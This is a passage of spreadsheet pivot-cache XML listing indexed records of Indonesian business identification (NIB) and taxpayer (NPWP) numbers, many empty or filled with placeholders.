    <x v="4538"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4575"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4595"/>
    <s v="nib"/>
    <n v="257000981619"/>
  </r>
  <r>
    <x v="4542"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4596"/>
    <s v="nib"/>
    <n v="289000941789"/>
  </r>
  <r>
    <x v="4519"/>
    <s v="npwp"/>
    <s v="48.221.001.0-545.000"/>
  </r>
  <r>
    <x v="4595"/>
    <s v="npwp"/>
    <s v="72.108.835.9-822.000"/>
  </r>
  <r>
    <x v="4597"/>
    <s v="nib"/>
    <n v="257000981619"/>
  </r>
  <r>
    <x v="4484"/>
    <s v="npwp"/>
    <s v="96.013.301.5-041.000"/>
  </r>
  <r>
    <x v="4598"/>
    <s v="nib"/>
    <n v="222010111352"/>
  </r>
  <r>
    <x v="919"/>
    <s v="nib"/>
    <n v="9120307922365"/>
  </r>
  <r>
    <x v="4599"/>
    <s v="nib"/>
    <n v="222010111352"/>
  </r>
  <r>
    <x v="4600"/>
    <s v="nib"/>
    <n v="8120003941051"/>
  </r>
  <r>
    <x v="4601"/>
    <s v="nib"/>
    <n v="220106332508"/>
  </r>
  <r>
    <x v="4602"/>
    <s v="nib"/>
    <n v="8120014151279"/>
  </r>
  <r>
    <x v="6"/>
    <s v="nib"/>
    <n v="8120008920266"/>
  </r>
  <r>
    <x v="4603"/>
    <s v="nib"/>
    <n v="8120002841036"/>
  </r>
  <r>
    <x v="4604"/>
    <s v="nib"/>
    <n v="220101352867"/>
  </r>
  <r>
    <x v="4605"/>
    <s v="nib"/>
    <n v="9120404713302"/>
  </r>
  <r>
    <x v="4606"/>
    <s v="nib"/>
    <n v="9120404713302"/>
  </r>
  <r>
    <x v="4607"/>
    <s v="nib"/>
    <n v="8120001731663"/>
  </r>
  <r>
    <x v="762"/>
    <s v="nib"/>
    <n v="8120105742562"/>
  </r>
  <r>
    <x v="4608"/>
    <s v="nib"/>
    <n v="8120004960053"/>
  </r>
  <r>
    <x v="4609"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="940"/>
    <s v="nib"/>
    <n v="8120105800474"/>
  </r>
  <r>
    <x v="4610"/>
    <s v="nib"/>
    <n v="9120107791435"/>
  </r>
  <r>
    <x v="4611"/>
    <s v="nib"/>
    <n v="9120009932253"/>
  </r>
  <r>
    <x v="4522"/>
    <s v="npwp"/>
    <s v="94.062.219.4-009.000"/>
  </r>
  <r>
    <x v="4612"/>
    <s v="nib"/>
    <n v="220206370864"/>
  </r>
  <r>
    <x v="4579"/>
    <s v="npwp"/>
    <s v="95.716.403.1-801.000"/>
  </r>
  <r>
    <x v="4613"/>
    <s v="nib"/>
    <n v="286000932356"/>
  </r>
  <r>
    <x v="4614"/>
    <s v="nib"/>
    <n v="258000932636"/>
  </r>
  <r>
    <x v="4615"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4615"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4616"/>
    <s v="nib"/>
    <n v="216010230844"/>
  </r>
  <r>
    <x v="4610"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4608"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4592"/>
    <s v="npwp"/>
    <s v="24.625.974.1-503.000"/>
  </r>
  <r>
    <x v="4617"/>
    <s v="nib"/>
    <n v="9120208242369"/>
  </r>
  <r>
    <x v="4618"/>
    <s v="nib"/>
    <n v="206010120927"/>
  </r>
  <r>
    <x v="4603"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4611"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4612"/>
    <s v="npwp"/>
    <s v="82.037.364.5-416.000"/>
  </r>
  <r>
    <x v="4619"/>
    <s v="nib"/>
    <n v="220002463407"/>
  </r>
  <r>
    <x v="4620"/>
    <s v="nib"/>
    <n v="8120005811069"/>
  </r>
  <r>
    <x v="4621"/>
    <s v="nib"/>
    <n v="286010210298"/>
  </r>
  <r>
    <x v="4622"/>
    <s v="nib"/>
    <n v="9120105420528"/>
  </r>
  <r>
    <x v="4586"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4623"/>
    <s v="nib"/>
    <n v="9120118030226"/>
  </r>
  <r>
    <x v="4599"/>
    <s v="npwp"/>
    <n v="965319189501000"/>
  </r>
  <r>
    <x v="4624"/>
    <s v="nib"/>
    <n v="220007292776"/>
  </r>
  <r>
    <x v="447"/>
    <s v="nib"/>
    <n v="282011101101"/>
  </r>
  <r>
    <x v="945"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4625"/>
    <s v="nib"/>
    <n v="9120307331546"/>
  </r>
  <r>
    <x v="4626"/>
    <s v="nib"/>
    <n v="239010021634"/>
  </r>
  <r>
    <x v="4627"/>
    <s v="nib"/>
    <n v="8120210022746"/>
  </r>
  <r>
    <x v="4624"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4553"/>
    <s v="npwp"/>
    <n v="954419685513000"/>
  </r>
  <r>
    <x v="1993"/>
    <s v="npwp"/>
    <s v="02 981.487.8-214.000"/>
  </r>
  <r>
    <x v="4628"/>
    <s v="nib"/>
    <s v="ADA"/>
  </r>
  <r>
    <x v="4628"/>
    <s v="npwp"/>
    <s v="ADA"/>
  </r>
  <r>
    <x v="4616"/>
    <s v="npwp"/>
    <s v="96.714.752.1-222.000"/>
  </r>
  <r>
    <x v="464"/>
    <s v="nib"/>
    <n v="9120208242369"/>
  </r>
  <r>
    <x v="4623"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4629"/>
    <s v="nib"/>
    <n v="220302802894"/>
  </r>
  <r>
    <x v="4630"/>
    <s v="nib"/>
    <n v="9120317162303"/>
  </r>
  <r>
    <x v="4631"/>
    <s v="nib"/>
    <n v="220302802894"/>
  </r>
  <r>
    <x v="4632"/>
    <s v="nib"/>
    <n v="220302802894"/>
  </r>
  <r>
    <x v="4633"/>
    <s v="nib"/>
    <n v="209010041146"/>
  </r>
  <r>
    <x v="4591"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4634"/>
    <s v="nib"/>
    <n v="8120015272896"/>
  </r>
  <r>
    <x v="4635"/>
    <s v="nib"/>
    <n v="279010150529"/>
  </r>
  <r>
    <x v="4629"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4636"/>
    <s v="nib"/>
    <n v="2204078822146"/>
  </r>
  <r>
    <x v="4634"/>
    <s v="npwp"/>
    <s v="86.888.822.3-403.000"/>
  </r>
  <r>
    <x v="4625"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4637"/>
    <s v="nib"/>
    <n v="9120213211028"/>
  </r>
  <r>
    <x v="4619"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4613"/>
    <s v="npwp"/>
    <s v="96.000.271.5-723.000"/>
  </r>
  <r>
    <x v="4638"/>
    <s v="nib"/>
    <n v="210010250228"/>
  </r>
  <r>
    <x v="4614"/>
    <s v="npwp"/>
    <s v="95.976.227.9-723.000"/>
  </r>
  <r>
    <x v="4602"/>
    <s v="npwp"/>
    <s v="02.069.816.3-511.000"/>
  </r>
  <r>
    <x v="4639"/>
    <s v="nib"/>
    <n v="286010210298"/>
  </r>
  <r>
    <x v="4640"/>
    <s v="nib"/>
    <n v="9120118110879"/>
  </r>
  <r>
    <x v="4641"/>
    <s v="nib"/>
    <n v="8120014151279"/>
  </r>
  <r>
    <x v="4642"/>
    <s v="nib"/>
    <n v="8120106961024"/>
  </r>
  <r>
    <x v="4643"/>
    <s v="nib"/>
    <n v="230000922248"/>
  </r>
  <r>
    <x v="4644"/>
    <s v="nib"/>
    <n v="9120307232559"/>
  </r>
  <r>
    <x v="4645"/>
    <s v="nib"/>
    <n v="8120004991331"/>
  </r>
  <r>
    <x v="832"/>
    <s v="nib"/>
    <n v="8120008811366"/>
  </r>
  <r>
    <x v="4646"/>
    <s v="nib"/>
    <n v="8120102992858"/>
  </r>
  <r>
    <x v="4647"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4648"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4649"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4650"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4481"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4640"/>
    <s v="npwp"/>
    <s v="81.099.891.4.604.000"/>
  </r>
  <r>
    <x v="4651"/>
    <s v="nib"/>
    <n v="220003141052"/>
  </r>
  <r>
    <x v="4652"/>
    <s v="nib"/>
    <n v="9120116030276"/>
  </r>
  <r>
    <x v="4653"/>
    <s v="nib"/>
    <n v="220007252217"/>
  </r>
  <r>
    <x v="4654"/>
    <s v="nib"/>
    <n v="9120306252176"/>
  </r>
  <r>
    <x v="4655"/>
    <s v="nib"/>
    <n v="233010202142"/>
  </r>
  <r>
    <x v="4644"/>
    <s v="npwp"/>
    <n v="28813921036000"/>
  </r>
  <r>
    <x v="4655"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4656"/>
    <s v="nib"/>
    <n v="277010242893"/>
  </r>
  <r>
    <x v="4657"/>
    <s v="nib"/>
    <n v="220100262776"/>
  </r>
  <r>
    <x v="4645"/>
    <s v="npwp"/>
    <s v="02.174.668.0.219-000"/>
  </r>
  <r>
    <x v="4658"/>
    <s v="nib"/>
    <n v="8120015222426"/>
  </r>
  <r>
    <x v="4659"/>
    <s v="nib"/>
    <n v="262010113606"/>
  </r>
  <r>
    <x v="4626"/>
    <s v="npwp"/>
    <s v="96.174.197.2-809.000"/>
  </r>
  <r>
    <x v="4660"/>
    <s v="nib"/>
    <n v="9120001622808"/>
  </r>
  <r>
    <x v="4653"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4661"/>
    <s v="nib"/>
    <n v="9120103851955"/>
  </r>
  <r>
    <x v="4662"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4663"/>
    <s v="nib"/>
    <n v="9120005682453"/>
  </r>
  <r>
    <x v="4664"/>
    <s v="nib"/>
    <n v="9120005682453"/>
  </r>
  <r>
    <x v="4665"/>
    <s v="nib"/>
    <n v="220004491155"/>
  </r>
  <r>
    <x v="4666"/>
    <s v="nib"/>
    <n v="1223000100766"/>
  </r>
  <r>
    <x v="4667"/>
    <s v="nib"/>
    <n v="9120205143419"/>
  </r>
  <r>
    <x v="4668"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4669"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4663"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4651"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="967"/>
    <s v="nib"/>
    <n v="1223000100766"/>
  </r>
  <r>
    <x v="4661"/>
    <s v="npwp"/>
    <s v="80.224.609.0-801.000"/>
  </r>
  <r>
    <x v="4670"/>
    <s v="nib"/>
    <n v="8120100811706"/>
  </r>
  <r>
    <x v="4665"/>
    <s v="npwp"/>
    <s v="94.362.811.5-914.000"/>
  </r>
  <r>
    <x v="4671"/>
    <s v="nib"/>
    <n v="220100772929"/>
  </r>
  <r>
    <x v="968"/>
    <s v="nib"/>
    <n v="9120201192713"/>
  </r>
  <r>
    <x v="4672"/>
    <s v="nib"/>
    <n v="8120202812835"/>
  </r>
  <r>
    <x v="555"/>
    <s v="nib"/>
    <n v="1252000612747"/>
  </r>
  <r>
    <x v="4673"/>
    <s v="nib"/>
    <n v="245010131813"/>
  </r>
  <r>
    <x v="4674"/>
    <s v="nib"/>
    <n v="2200025220333"/>
  </r>
  <r>
    <x v="4675"/>
    <s v="nib"/>
    <n v="8120219101125"/>
  </r>
  <r>
    <x v="4675"/>
    <s v="npwp"/>
    <s v="01.070.707.3-057.000"/>
  </r>
  <r>
    <x v="4676"/>
    <s v="nib"/>
    <n v="8120201890372"/>
  </r>
  <r>
    <x v="4674"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4677"/>
    <s v="nib"/>
    <n v="8120101833713"/>
  </r>
  <r>
    <x v="4678"/>
    <s v="nib"/>
    <n v="9120007131089"/>
  </r>
  <r>
    <x v="4679"/>
    <s v="nib"/>
    <n v="8120212241415"/>
  </r>
  <r>
    <x v="4680"/>
    <s v="nib"/>
    <n v="220100772929"/>
  </r>
  <r>
    <x v="4681"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="4682"/>
    <s v="nib"/>
    <n v="8120108860612"/>
  </r>
  <r>
    <x v="4679"/>
    <s v="npwp"/>
    <s v="03.125.050.9-435.001"/>
  </r>
  <r>
    <x v="4672"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4683"/>
    <s v="nib"/>
    <n v="1239000121624"/>
  </r>
  <r>
    <x v="4667"/>
    <s v="npwp"/>
    <s v="83.280.855.4-822.000"/>
  </r>
  <r>
    <x v="4684"/>
    <s v="nib"/>
    <n v="8120311082894"/>
  </r>
  <r>
    <x v="4627"/>
    <s v="npwp"/>
    <s v="86.338.885.6-643.000"/>
  </r>
  <r>
    <x v="4685"/>
    <s v="nib"/>
    <n v="220103762731"/>
  </r>
  <r>
    <x v="4686"/>
    <s v="nib"/>
    <n v="281010200479"/>
  </r>
  <r>
    <x v="4463"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4687"/>
    <s v="nib"/>
    <n v="270010230122"/>
  </r>
  <r>
    <x v="4680"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4681"/>
    <s v="npwp"/>
    <s v="NPWP"/>
  </r>
  <r>
    <x v="872"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4688"/>
    <s v="nib"/>
    <n v="292010162235"/>
  </r>
  <r>
    <x v="4276"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4660"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4684"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4678"/>
    <s v="npwp"/>
    <s v="02.853.578.9-804.000"/>
  </r>
  <r>
    <x v="4689"/>
    <s v="nib"/>
    <n v="1256000141026"/>
  </r>
  <r>
    <x v="4641"/>
    <s v="npwp"/>
    <s v="02.069.816.3-511.000"/>
  </r>
  <r>
    <x v="4690"/>
    <s v="nib"/>
    <n v="9120006390461"/>
  </r>
  <r>
    <x v="4688"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4677"/>
    <s v="npwp"/>
    <s v="01.768.295.6-921.000"/>
  </r>
  <r>
    <x v="4682"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4691"/>
    <s v="nib"/>
    <n v="222010040195"/>
  </r>
  <r>
    <x v="4692"/>
    <s v="nib"/>
    <n v="9120303490181"/>
  </r>
  <r>
    <x v="4693"/>
    <s v="nib"/>
    <n v="8120006930063"/>
  </r>
  <r>
    <x v="4693"/>
    <s v="npwp"/>
    <s v="01.510.676.8-641.000"/>
  </r>
  <r>
    <x v="4692"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4694"/>
    <s v="nib"/>
    <n v="9120100300878"/>
  </r>
  <r>
    <x v="4695"/>
    <s v="nib"/>
    <n v="9120502990334"/>
  </r>
  <r>
    <x v="4696"/>
    <s v="nib"/>
    <n v="205010161314"/>
  </r>
  <r>
    <x v="4697"/>
    <s v="nib"/>
    <n v="912021616129"/>
  </r>
  <r>
    <x v="4698"/>
    <s v="nib"/>
    <n v="9120319152262"/>
  </r>
  <r>
    <x v="4699"/>
    <s v="nib"/>
    <n v="239010151118"/>
  </r>
  <r>
    <x v="4700"/>
    <s v="nib"/>
    <n v="220101322366"/>
  </r>
  <r>
    <x v="4701"/>
    <s v="nib"/>
    <n v="220101322366"/>
  </r>
  <r>
    <x v="4702"/>
    <s v="nib"/>
    <n v="1256000141026"/>
  </r>
  <r>
    <x v="4703"/>
    <s v="nib"/>
    <n v="220008672228"/>
  </r>
  <r>
    <x v="4704"/>
    <s v="nib"/>
    <n v="9120006841653"/>
  </r>
  <r>
    <x v="4702"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4705"/>
    <s v="nib"/>
    <n v="9120202122356"/>
  </r>
  <r>
    <x v="4706"/>
    <s v="nib"/>
    <n v="8120110152492"/>
  </r>
  <r>
    <x v="4706"/>
    <s v="npwp"/>
    <s v="01.084.163.3-904.000"/>
  </r>
  <r>
    <x v="4704"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4691"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4707"/>
    <s v="nib"/>
    <n v="220208881449"/>
  </r>
  <r>
    <x v="4708"/>
    <s v="nib"/>
    <n v="9120202252689"/>
  </r>
  <r>
    <x v="4709"/>
    <s v="nib"/>
    <n v="9120202252689"/>
  </r>
  <r>
    <x v="4710"/>
    <s v="nib"/>
    <n v="1283000142716"/>
  </r>
  <r>
    <x v="4703"/>
    <s v="npwp"/>
    <s v="NPWP PERUSAHAAN"/>
  </r>
  <r>
    <x v="4711"/>
    <s v="nib"/>
    <n v="8120009950544"/>
  </r>
  <r>
    <x v="4712"/>
    <s v="nib"/>
    <n v="8120009950544"/>
  </r>
  <r>
    <x v="4713"/>
    <s v="nib"/>
    <n v="9120201140329"/>
  </r>
  <r>
    <x v="4711"/>
    <s v="npwp"/>
    <s v="21.058.887.7-047.000"/>
  </r>
  <r>
    <x v="4714"/>
    <s v="nib"/>
    <n v="8120101703303"/>
  </r>
  <r>
    <x v="4715"/>
    <s v="nib"/>
    <n v="1279000100048"/>
  </r>
  <r>
    <x v="4716"/>
    <s v="nib"/>
    <n v="220004510356"/>
  </r>
  <r>
    <x v="4713"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4717"/>
    <s v="nib"/>
    <n v="262010113606"/>
  </r>
  <r>
    <x v="4718"/>
    <s v="nib"/>
    <n v="9120107153219"/>
  </r>
  <r>
    <x v="4719"/>
    <s v="nib"/>
    <n v="220501802287"/>
  </r>
  <r>
    <x v="4714"/>
    <s v="npwp"/>
    <s v="72.999.441.8-112.001"/>
  </r>
  <r>
    <x v="422"/>
    <s v="nib"/>
    <n v="9120007391485"/>
  </r>
  <r>
    <x v="4696"/>
    <s v="npwp"/>
    <s v="73.600.857.4-221.000"/>
  </r>
  <r>
    <x v="4720"/>
    <s v="nib"/>
    <n v="1267000122266"/>
  </r>
  <r>
    <x v="4721"/>
    <s v="nib"/>
    <n v="220002180379"/>
  </r>
  <r>
    <x v="4722"/>
    <s v="nib"/>
    <n v="9120307232559"/>
  </r>
  <r>
    <x v="4721"/>
    <s v="npwp"/>
    <s v="93.901.390.0.503.000"/>
  </r>
  <r>
    <x v="4686"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4697"/>
    <s v="npwp"/>
    <s v="15.016.487.9-221.000"/>
  </r>
  <r>
    <x v="4698"/>
    <s v="npwp"/>
    <s v="95.407.930.7-221.000"/>
  </r>
  <r>
    <x v="4699"/>
    <s v="npwp"/>
    <s v="86.499.155.9-221.000"/>
  </r>
  <r>
    <x v="473"/>
    <s v="nib"/>
    <n v="8120008991245"/>
  </r>
  <r>
    <x v="4723"/>
    <s v="nib"/>
    <n v="220107732517"/>
  </r>
  <r>
    <x v="4723"/>
    <s v="npwp"/>
    <n v="863803425201000"/>
  </r>
  <r>
    <x v="4724"/>
    <s v="nib"/>
    <n v="9120109451415"/>
  </r>
  <r>
    <x v="4719"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4544"/>
    <s v="npwp"/>
    <n v="954927653951000"/>
  </r>
  <r>
    <x v="4725"/>
    <s v="nib"/>
    <n v="221010061493"/>
  </r>
  <r>
    <x v="4726"/>
    <s v="nib"/>
    <n v="1276000140547"/>
  </r>
  <r>
    <x v="4727"/>
    <s v="nib"/>
    <n v="247010291554"/>
  </r>
  <r>
    <x v="4726"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4727"/>
    <s v="npwp"/>
    <s v="96.836.823.3-047.000"/>
  </r>
  <r>
    <x v="4728"/>
    <s v="nib"/>
    <n v="8120214073117"/>
  </r>
  <r>
    <x v="4716"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4729"/>
    <s v="nib"/>
    <n v="220200871381"/>
  </r>
  <r>
    <x v="4724"/>
    <s v="npwp"/>
    <s v="06.098.063.8-213.000"/>
  </r>
  <r>
    <x v="4670"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4730"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="4731"/>
    <s v="nib"/>
    <n v="231010171575"/>
  </r>
  <r>
    <x v="4730"/>
    <s v="npwp"/>
    <n v="15171184401001"/>
  </r>
  <r>
    <x v="4732"/>
    <s v="nib"/>
    <n v="9120205132619"/>
  </r>
  <r>
    <x v="4733"/>
    <s v="nib"/>
    <n v="220205331103"/>
  </r>
  <r>
    <x v="4729"/>
    <s v="npwp"/>
    <s v="95.613.488.6-522.000"/>
  </r>
  <r>
    <x v="4732"/>
    <s v="npwp"/>
    <n v="96240759951000"/>
  </r>
  <r>
    <x v="4734"/>
    <s v="nib"/>
    <n v="9120004840975"/>
  </r>
  <r>
    <x v="4735"/>
    <s v="nib"/>
    <n v="8120106880083"/>
  </r>
  <r>
    <x v="4736"/>
    <s v="nib"/>
    <n v="1272000131598"/>
  </r>
  <r>
    <x v="4733"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4737"/>
    <s v="nib"/>
    <n v="220205201843"/>
  </r>
  <r>
    <x v="4588"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="202"/>
    <s v="nib"/>
    <n v="8120215012028"/>
  </r>
  <r>
    <x v="4705"/>
    <s v="npwp"/>
    <s v="21.123.080.0-432.000"/>
  </r>
  <r>
    <x v="4738"/>
    <s v="nib"/>
    <n v="9120101120539"/>
  </r>
  <r>
    <x v="4734"/>
    <s v="npwp"/>
    <s v="15.087.214.1-726.000"/>
  </r>
  <r>
    <x v="4739"/>
    <s v="nib"/>
    <n v="1287000111569"/>
  </r>
  <r>
    <x v="4740"/>
    <s v="nib"/>
    <n v="9120003971676"/>
  </r>
  <r>
    <x v="4741"/>
    <s v="nib"/>
    <n v="9120313171299"/>
  </r>
  <r>
    <x v="4742"/>
    <s v="nib"/>
    <n v="9120313171299"/>
  </r>
  <r>
    <x v="4701"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4736"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4743"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4744"/>
    <s v="nib"/>
    <n v="8120201832794"/>
  </r>
  <r>
    <x v="4744"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4745"/>
    <s v="nib"/>
    <n v="9120301811666"/>
  </r>
  <r>
    <x v="4746"/>
    <s v="nib"/>
    <n v="1286000220187"/>
  </r>
  <r>
    <x v="4747"/>
    <s v="nib"/>
    <n v="1277040303900000"/>
  </r>
  <r>
    <x v="1272"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4748"/>
    <s v="nib"/>
    <n v="8120003850772"/>
  </r>
  <r>
    <x v="4748"/>
    <s v="npwp"/>
    <s v="02.938.499.7-603.000"/>
  </r>
  <r>
    <x v="4676"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4738"/>
    <s v="npwp"/>
    <n v="869413567503000"/>
  </r>
  <r>
    <x v="4749"/>
    <s v="nib"/>
    <n v="1281000122688"/>
  </r>
  <r>
    <x v="4750"/>
    <s v="nib"/>
    <n v="1286000220187"/>
  </r>
  <r>
    <x v="4751"/>
    <s v="nib"/>
    <n v="9120317022015"/>
  </r>
  <r>
    <x v="4752"/>
    <s v="nib"/>
    <n v="290010040957"/>
  </r>
  <r>
    <x v="4749"/>
    <s v="npwp"/>
    <s v="75.642.658.1-941.000"/>
  </r>
  <r>
    <x v="4753"/>
    <s v="nib"/>
    <n v="1206000231019"/>
  </r>
  <r>
    <x v="4754"/>
    <s v="nib"/>
    <n v="912001610061"/>
  </r>
  <r>
    <x v="4755"/>
    <s v="nib"/>
    <n v="210010250228"/>
  </r>
  <r>
    <x v="4756"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4757"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4758"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4759"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4760"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4761"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4762"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4763"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4764"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4765"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4766"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4767"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4768"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4769"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4770"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4771"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4772"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4773"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4774"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4775"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4776"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4777"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4778"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4779"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4780"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4781"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4782"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4783"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4784"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4785"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4786"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4787"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4788"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4789"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4790"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4791"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4792"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4793"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4794"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4795"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4796"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4797"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4798"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4799"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4800"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4801"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4802"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4803"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4804"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4805"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4806"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4807"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4808"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4809"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4810"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4811"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4812"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4813"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4814"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4815"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
